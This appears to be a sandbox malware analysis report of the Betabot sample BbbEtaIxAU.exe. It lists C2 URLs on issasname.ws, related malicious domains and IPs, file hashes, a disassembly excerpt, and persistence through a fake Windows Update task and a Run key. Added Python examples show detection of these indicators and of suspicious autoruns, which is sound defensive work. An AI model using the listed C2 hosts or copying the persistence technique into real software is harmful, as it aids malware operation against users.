http://issasname.ws/xyz/abc/order.php?id=8413675 | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.php?pid=668 | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.php?id=7277094 | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.php?id=8088252 | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.php?pid=925 | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.phpcrosoft | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.php?page=127 | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.php?id=1637135 | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.php?id=9504479A | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.php1 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
issasname.ws | 64.70.19.203 | true | true | | unknown
issasname.pw | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://issasname.ws/xyz/abc/order.php?id=1465544 | true | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.php?page=33 | true | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.php?id=4923518 | true | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.php?page=70 | true | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.php?id=9504479 | true | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.php | true | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.php?page=38 | true | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.php?id=4981026 | true | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.php?id=3966837 | true | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.php?id=8314615 | true | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.php?id=575573 | true | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.php?page=69 | true | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.php?id=5889637 | true | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.php?pid=631 | true | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.php?id=7277094 | true | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.php?id=8413675 | true | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.php?pid=668 | true | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.php?id=8088252 | true | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.php?pid=925 | true | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.php?page=127 | true | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.php?id=1637135 | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://issasname.ws/xyz/abc/order.php?id=5889637F | WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.php1EC24CF002C2 | WerFault.exe, 00000004.00000002.567116030.00000000003AF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.php?id=8088252ZoFl | WerFault.exe, 00000004.00000002.572746061.0000000004C40000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.php?page=7- | WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://%s%s/image.php?id=%sRtlQueryElevationFlagsCritical | BbbEtaIxAU.exe, 00000000.00000003.303714856.0000000003450000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.316616817.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.346386030.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.340678634.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.321889200.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.392904452.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.414915674.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.387584046.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.408213818.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.436527162.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.334422756.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.365991761.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000000.304158494.0000000002860000.00000040.80000000.00040000.00000000.sdmp, WerFault.exe, 00000004.00000003.375167210.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.312736811.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.357948198.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.352061245.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.398750308.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, WerFault.exe, 00000004.00000003.381234590.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 00000005.00000002.572526351.0000000003A88000.00000040.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://issasname.ws/xyz/abc/order.php?id=8314615Fv | WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.phpion | WerFault.exe, 00000004.00000002.567116030.00000000003AF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.php?page=7 | WerFault.exe, 00000004.00000002.565612970.0000000000315000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000004.00000002.567116030.00000000003AF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.php?page=72 | WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://%s%s/image.php?id=%s | BbbEtaIxAU.exe, 00000000.00000003.303714856.0000000003450000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, WerFault.exe, 00000004.00000003.316616817.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.346386030.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.340678634.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.321889200.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.392904452.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.414915674.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.387584046.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.408213818.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.436527162.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.334422756.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.365991761.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000000.304158494.0000000002860000.00000040.80000000.00040000.00000000.sdmp, WerFault.exe, 00000004.00000003.375167210.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.312736811.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.357948198.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.352061245.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.398750308.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, WerFault.exe, 00000004.00000003.381234590.00000000004E0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://issasname.ws/xyz/abc/order.phpO | WerFault.exe, 00000004.00000003.436732002.00000000003AE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.phpDESKTOP- | WerFault.exe, 00000004.00000003.436732002.00000000003AE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.php?id=5889637rivers | WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.php9p | WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.phpcrosoft | WerFault.exe, 00000004.00000002.567116030.00000000003AF000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.436732002.00000000003AE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.php1 | WerFault.exe, 00000004.00000003.436732002.00000000003AE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://issasname.ws/xyz/abc/order.php?id=9504479A | WerFault.exe, 00000004.00000003.398882163.00000000003AD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
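The URL strings above were recovered from process memory, and a number of them carry bytes that simply followed the URL in the dump (order.phpcrosoft, order.php?id=8088252ZoFl, order.php1EC24CF002C2), while the two http://%s%s/image.php?id=%s entries are the bot's printf-style templates rather than concrete URLs. Before any of this goes into a blocklist or a detection rule it has to be normalised to host, path and a single numeric id=, page= or pid= parameter, and the host has to be matched exactly rather than as a substring. The Python below is an added example written for this page, not code from the Joe Sandbox report or from the Betabot sample: it canonicalises a subset of the listed strings and then runs an exact-host check over constructed proxy log lines. The log format, the client addresses and the lookalike host issasname.ws.example.com are assumptions made for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Indicators taken from the report's domain and URL tables.
C2_HOSTS = {"issasname.ws", "issasname.pw"}
C2_PATH = "/xyz/abc/order.php"

# A subset of the strings Joe Sandbox recovered from process memory, copied
# from the URL tables above.  Trailing bytes such as "crosoft", "DESKTOP-" or
# "ZoFl" are whatever followed the URL in the dump, not part of the URL, and
# the two "%s" entries are the bot's printf-style templates.
MEMORY_STRINGS = [
    "http://issasname.ws/xyz/abc/order.php?page=33",
    "http://issasname.ws/xyz/abc/order.php1EC24CF002C2",
    "http://issasname.ws/xyz/abc/order.php?id=5889637F",
    "http://issasname.ws/xyz/abc/order.php?id=8088252ZoFl",
    "http://%s%s/image.php?id=%sRtlQueryElevationFlagsCritical",
    "http://issasname.ws/xyz/abc/order.php?page=7-",
    "http://issasname.ws/xyz/abc/order.php?page=70",
    "http://issasname.ws/xyz/abc/order.phpion",
    "http://issasname.ws/xyz/abc/order.php?page=7",
    "http://%s%s/image.php?id=%s",
    "http://issasname.ws/xyz/abc/order.php",
    "http://issasname.ws/xyz/abc/order.phpDESKTOP-",
    "http://issasname.ws/xyz/abc/order.php?id=5889637rivers",
    "http://issasname.ws/xyz/abc/order.php?id=5889637",
    "http://issasname.ws/xyz/abc/order.php?pid=631",
    "http://issasname.ws/xyz/abc/order.phpcrosoft",
    "http://issasname.ws/xyz/abc/order.php?id=9504479A",
    "http://issasname.ws/xyz/abc/order.php1",
]

# Known host, the order.php path, then optionally one numeric id=/page=/pid=
# parameter.  re.match anchors only at the start, so memory junk after the
# recognised part is left unconsumed instead of breaking the match.
_C2_RE = re.compile(
    r"https?://(?P<host>[a-z0-9.-]+)(?P<path>/xyz/abc/order\.php)"
    r"(?:\?(?P<query>(?:id|page|pid)=\d+))?",
    re.IGNORECASE,
)


def normalise(raw):
    """Return the canonical C2 URL contained in a memory string, or None."""
    m = _C2_RE.match(raw)
    if not m or m["host"].lower() not in C2_HOSTS:
        return None  # "%s" templates and unrelated hosts end up here
    url = "http://" + m["host"].lower() + m["path"]
    return url + "?" + m["query"] if m["query"] else url


def unique_c2_urls(strings):
    """Map each canonical URL to the raw memory strings it was recovered from."""
    seen = defaultdict(list)
    for raw in strings:
        url = normalise(raw)
        if url:
            seen[url].append(raw)
    return dict(seen)


# Constructed proxy log lines, not from the report: time, client, method, URL, status.
LOG_LINES = [
    "2022-12-05T12:46:10Z 192.168.2.4 GET http://issasname.ws/xyz/abc/order.php?id=5889637 200",
    "2022-12-05T12:46:11Z 192.168.2.4 GET http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab 200",
    "2022-12-05T12:46:12Z 192.168.2.7 POST http://issasname.pw/xyz/abc/order.php?page=7 200",
    "2022-12-05T12:46:13Z 192.168.2.9 GET http://issasname.ws.example.com/xyz/abc/order.php?id=1 404",
    "2022-12-05T12:46:14Z 192.168.2.9 GET http://issasname.ws/robots.txt 404",
]


def find_c2_requests(lines):
    """Return (client, url) for each log line that is a Betabot check-in."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 5:
            continue
        client, url = fields[1], fields[3]
        parts = urlsplit(url)
        # Exact host comparison: a substring test would also fire on the lookalike host.
        if parts.hostname in C2_HOSTS and parts.path == C2_PATH:
            hits.append((client, url))
    return hits


if __name__ == "__main__":
    for url, raws in sorted(unique_c2_urls(MEMORY_STRINGS).items()):
        print(f"{url}  ({len(raws)} raw string(s))")
    print(find_c2_requests(LOG_LINES))
```

Run as-is, the 18 raw strings collapse to 8 canonical URLs, six of which were only the bare order.php path with memory junk appended, and only the two genuine check-ins in the constructed log are reported. The numeric parameter values are per-infection identifiers, so a production rule should key on host and path and treat the query as context rather than as a fixed indicator.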
IP | Domain | Country | ASN | ASN Name | Malicious
64.70.19.203 | issasname.ws | United States | 3561 | CENTURYLINK-LEGACY-SAVVISUS | true
                      IP
                      192.168.2.1
                      Joe Sandbox Version:36.0.0 Rainbow Opal
                      Analysis ID:760719
                      Start date and time:2022-12-05 12:45:08 +01:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 9m 57s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:BbbEtaIxAU.exe
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:10
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:17
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.phis.troj.spyw.evad.winEXE@9/1@48/2
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 90.7% (good quality ratio 71.9%)
                      • Quality average: 56.6%
                      • Quality standard deviation: 38%
                      HCA Information:
                      • Successful, ratio: 97%
                      • Number of executed functions: 118
                      • Number of non-executed functions: 3
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                      • Excluded IPs from analysis (whitelisted): 20.112.52.29, 20.81.111.85, 20.84.181.62, 20.103.85.33, 20.53.203.50
                      • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, microsoft.com
• Not all processes were analyzed, report is missing behavior information
                      • Report creation exceeded maximum time and may have missing disassembly code information.
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
12:46:05 | Task Scheduler | Run new task: Windows Update Check - 0x03C40151 path: C:\ProgramData\Quicktime s>8.5.1\yvneslhpc.exe
12:46:07 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Quicktime 8.5.1 "C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe"
12:46:09 | API Interceptor | 17x Sleep call for process: zkqrKAufFycYKMdseGdhuYpyTVNu.exe modified
12:46:15 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Quicktime 8.5.1 "C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe"
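The two persistence entries in the timeline above, the scheduled task "Windows Update Check - 0x03C40151" and the HKCU Run value "Quicktime 8.5.1", both point at C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe, a directory a standard user can create without elevation. A quick host check is therefore to list every autorun whose binary lives in a user-writable location. The Python below is an added example, not part of the report: it parses the text that reg query and schtasks /query /fo CSV /v print on Windows and flags entries under C:\ProgramData, C:\Users or C:\Windows\Temp. The embedded output is constructed to match those two formats and contains the report's two entries plus one made-up benign entry; the hostname, the benign ExampleUpdater value and the trimmed schtasks column set are assumptions for the example.

```python
import csv
import io
import re

# Roots a standard user can write to.  C:\ProgramData is writable at the top
# level by default, which is why this sample can drop into
# C:\ProgramData\Quicktime 8.5.1 without elevation.
USER_WRITABLE_ROOTS = (
    "c:\\programdata\\",
    "c:\\users\\",          # AppData, Temp, Downloads, Desktop ...
    "c:\\windows\\temp\\",
)

# Constructed in the shape of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
# output; the Quicktime value is the one from the timeline above, ExampleUpdater is made up.
RUN_KEY_EXPORT = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    ExampleUpdater    REG_SZ    "C:\Program Files\Example\updater.exe" --quiet
    Quicktime 8.5.1    REG_SZ    "C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe"
"""

# Constructed in the shape of `schtasks /query /fo CSV /v` output (columns trimmed);
# the second task is the one from the timeline above.
SCHTASKS_CSV = r'''"HostName","TaskName","Status","Author","Task To Run"
"DESKTOP-EXAMPLE","\Microsoft\Windows\Defrag\ScheduledDefrag","Ready","Microsoft Corporation","%windir%\system32\defrag.exe -c -h -o -$"
"DESKTOP-EXAMPLE","\Windows Update Check - 0x03C40151","Ready","user","C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe"
'''


def executable_path(command):
    """Pull the program path out of an autorun command line."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.find('"', 1)]
    # Unquoted: take everything up to the first ".exe" so paths with spaces survive.
    m = re.match(r"(.*?\.exe)", command, re.IGNORECASE)
    return m.group(1) if m else command.split(" ", 1)[0]


def in_user_writable_location(path):
    """True when the path sits under one of USER_WRITABLE_ROOTS."""
    return path.lower().replace("/", "\\").startswith(USER_WRITABLE_ROOTS)


def parse_run_key(text):
    """(value name, command) pairs from the text reg query prints for a Run key."""
    entries = []
    for line in text.splitlines():
        m = re.match(r"^\s+(?P<name>.+?)\s{2,}REG_(?:EXPAND_)?SZ\s{2,}(?P<data>.+)$", line)
        if m:
            entries.append((m["name"], m["data"].strip()))
    return entries


def parse_schtasks_csv(text):
    """(task name, command) pairs from schtasks verbose CSV output."""
    return [(row["TaskName"], row["Task To Run"]) for row in csv.DictReader(io.StringIO(text))]


def suspicious_autoruns(run_entries, task_entries):
    """Autoruns whose executable lives somewhere a standard user can write."""
    findings = []
    for kind, entries in (("run", run_entries), ("task", task_entries)):
        for name, command in entries:
            exe = executable_path(command)
            if in_user_writable_location(exe):
                findings.append((kind, name, exe))
    return findings


if __name__ == "__main__":
    for kind, name, exe in suspicious_autoruns(parse_run_key(RUN_KEY_EXPORT),
                                               parse_schtasks_csv(SCHTASKS_CSV)):
        print(f"[{kind}] {name} -> {exe}")
```

On a live host, feed it the real output of reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run (and the HKLM and Wow6432Node variants) and schtasks /query /fo CSV /v. Expect legitimate hits under C:\Users\...\AppData (OneDrive, Teams and similar per-user installers), so keep an allowlist; the C:\ProgramData hit combined with a task name that imitates Windows Update is the pattern worth escalating.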
Match: 64.70.19.203
Associated Sample Name / URL | Detection | Context
GxELazkKkG.exe | malicious | enahmnhqah.ws/imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=Unk
Readme.exe | malicious | ersaenrnwh.ws/imgs/krewa/nqxa.php?id=50f5gzcu&s5=3159&lip=192.168.2.5&win=Unk
EAfIchN1gN.exe | malicious | ehmpeseeaa.ws/imgs/krewa/nqxa.php?id=5143sudk&s5=3159&lip=192.168.2.4&win=Unk
144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe | malicious | xircus.ws/kin/logout.php
Br6Pmt0MiZ.exe | malicious | thaus.ws/6
R5JbUb3muW.exe | malicious | thaus.ws/6
kmHFEwF36g.exe | malicious | thaus.ws/1
VkTXaNHTs6.exe | malicious | eaffuebudbeudbbk.ws/6
wNtMSZRvzI.exe | malicious | eafuebdbedbedggk.ws/4
y7ddF1vGqA.exe | malicious | deauduafzgezzfgk.ws/3
6FRRo6QFF2.exe | malicious | wduufbaueeubffgu.ws/5
Photo-149-101.jpg.exe | malicious | 304049943.ws/mailer/3
winsvcs.exe | malicious | 304049943.ws/mailer/3
Photo-137-158.jpg.exe | malicious | 304049943.ws/mailer/3
9v7gUCpZOr.exe | malicious | eaffuebudbeudbbu.ws/2
1rP65UzlyY.exe | malicious | eaffuebudbeudbbu.ws/5
JAGk3xeQ5I.exe | malicious | geueudusl.ws/vnc/2
SecuriteInfo.com.Trojan.Siggen10.14421.6375.exe | malicious | fheuhdwdzwgzdggu.ws/2
SecuriteInfo.com.Trojan.Siggen10.14421.24699.exe | malicious | wduufbaueeubffgr.ws/2
jHbg4HhuFN.exe | malicious | deauduafzgezzfgr.ws/5
                      No context
Match: CENTURYLINK-LEGACY-SAVVISUS
Associated Sample Name / URL | Detection | Context
RVs7Yo67uw.elf | malicious | 205.140.253.164
ZG11Q8WGTS.elf | malicious | 64.242.21.142
SPpRmdIkFp.elf | malicious | 63.128.144.125
3ts2As2Bkm.exe | malicious | 192.252.154.18
3yjVVrgxaK.elf | malicious | 167.216.225.147
SI58bdp966.elf | malicious | 208.147.9.48
ujPxX4gJbA.elf | malicious | 216.88.116.229
0fmEh2zmDj.exe | malicious | 192.252.154.18
robinbot_sample2 | malicious | 209.27.234.3
sora.arm.elf | malicious | 147.212.63.154
Yw0HhtLWAz.elf | malicious | 206.31.47.151
9ARcdeR3nP.elf | malicious | 64.242.21.138
0s41hOyQp6.elf | malicious | 208.147.9.36
oAUrOBvfbV.elf | malicious | 209.102.22.37
jew.arm7.elf | malicious | 64.41.151.59
brbrbr.x86.elf | malicious | 206.134.246.59
3y849k7eIG.elf | malicious | 216.219.107.216
ewfDbhCyw3.elf | malicious | 208.128.233.52
OnlppUfLJp.elf | malicious | 207.50.9.252
5WOPvndI8Z.elf | malicious | 67.130.158.88
                      No context
                      No context
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):47
                      Entropy (8bit):1.168829563685559
                      Encrypted:false
                      SSDEEP:3:/lSll2DQi:AoMi
                      MD5:DAB633BEBCCE13575989DCFA4E2203D6
                      SHA1:33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
                      SHA-256:1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
                      SHA-512:EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
                      Malicious:false
                      Preview:........................................user.
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.917083152739634
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:BbbEtaIxAU.exe
                      File size:141312
                      MD5:0de785a3d83482ee5b7e3e396a641bc7
                      SHA1:fc7326166024e8edfec82524e4a1e98041561fa4
                      SHA256:443095db638f2eb172dbfbe3730407c033b5ec86dde1e8b2f65df703b85cca51
                      SHA512:4345256e2a5906e8e962728f8a737505a17f5c5fc4018b48cc79ef75e8bcdaf2d049e9f0828b0f2961f673c9f68f89220dab3f714b94ace5b4037b55f996362f
                      SSDEEP:3072:7jyt0PeqCxRFPTd0nnqAY6xLdzTSQh1eK0jjGoeB44R/Gzkvx:7jMoCxTPTd85XHSQbe/avIzkv
                      TLSH:5CD31211A1C487BDC33719799B73E982A6338A5D1629A42BF339CF3AFB09D71CD02065
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3v..w...w...w...~o0.t...w...~...l...t...l.>.v...Richw...................PE..L....B.R..................................... ....@
                      Icon Hash:00828e8e8686b000
                      Entrypoint:0x40120a
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Time Stamp:0x52CF42E6 [Fri Jan 10 00:46:30 2014 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:4310dad400d93b4e4f05f962e6cc9eb8
                      Instruction
                      push ebp
                      mov ebp, esp
                      push ecx
                      mov eax, dword ptr fs:[00000030h]
                      push ebx
                      push esi
                      test eax, eax
                      je 00007F3698C13928h
                      cmp byte ptr [eax+02h], 00000001h
                      je 00007F3698C13952h
                      and dword ptr [ebp-04h], 00000000h
                      call 00007F3698C13720h
                      test eax, eax
                      je 00007F3698C13945h
                      lea ecx, dword ptr [ebp-04h]
                      push ecx
                      mov esi, eax
                      call 00007F3698C13820h
                      mov ebx, eax
                      pop ecx
                      test ebx, ebx
                      je 00007F3698C13933h
                      call 00007F3698C13779h
                      test eax, eax
                      je 00007F3698C1392Ah
                      push dword ptr [ebp-04h]
                      call 00007F3698C13DBEh
                      push 00000000h
                      call dword ptr [00402000h]
                      int3
                      push ebp
                      mov ebp, esp
                      mov ecx, dword ptr [eax+14h]
                      lea edx, dword ptr [ecx-01h]
                      mov dword ptr [eax+14h], edx
                      test ecx, ecx
                      jne 00007F3698C13945h
                      mov ecx, dword ptr [eax+04h]
                      lea edx, dword ptr [ecx-01h]
                      mov dword ptr [eax+04h], edx
                      test ecx, ecx
                      jne 00007F3698C13926h
                      xor eax, eax
                      pop ebp
                      ret
                      mov ecx, dword ptr [eax]
                      movzx edx, byte ptr [ecx]
                      inc ecx
                      mov dword ptr [eax+10h], edx
                      mov dword ptr [eax], ecx
                      mov dword ptr [eax+14h], 00000007h
                      mov edx, dword ptr [eax+10h]
                      mov ecx, edx
                      add edx, edx
                      shr ecx, 07h
                      mov dword ptr [eax+10h], edx
                      mov eax, dword ptr [ebp+08h]
                      and ecx, 01h
                      mov dword ptr [eax], ecx
                      xor eax, eax
                      inc eax
                      pop ebp
                      ret
                      push ebp
                      mov ebp, esp
                      push ecx
                      push esi
                      xor esi, esi
                      inc esi
                      lea eax, dword ptr [ebp-04h]
                      push eax
                      mov eax, dword ptr [ebp+08h]
                      call 00007F3698C138C4h
                      pop ecx
                      test eax, eax
                      je 00007F3698C1394Ah
                      mov eax, dword ptr [ebp-04h]
                      lea esi, dword ptr [eax+esi*2]
                      lea eax, dword ptr [ebp-04h]
                      push eax
                      mov eax, dword ptr [ebp+08h]
                      call 00007F3698C138ADh
                      Programming Language:
                      • [IMP] VS2008 SP1 build 30729
                      • [LNK] VS2010 SP1 build 40219
                       Name | Virtual Address | Virtual Size | Is in Section
                       IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                       IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2140 | 0x28 | .rdata
                       IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3000 | 0x21564 | .rsrc
                       IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                       IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                       IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25000 | 0x18 | .reloc
                       IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                       IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                       IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                       IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                       IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
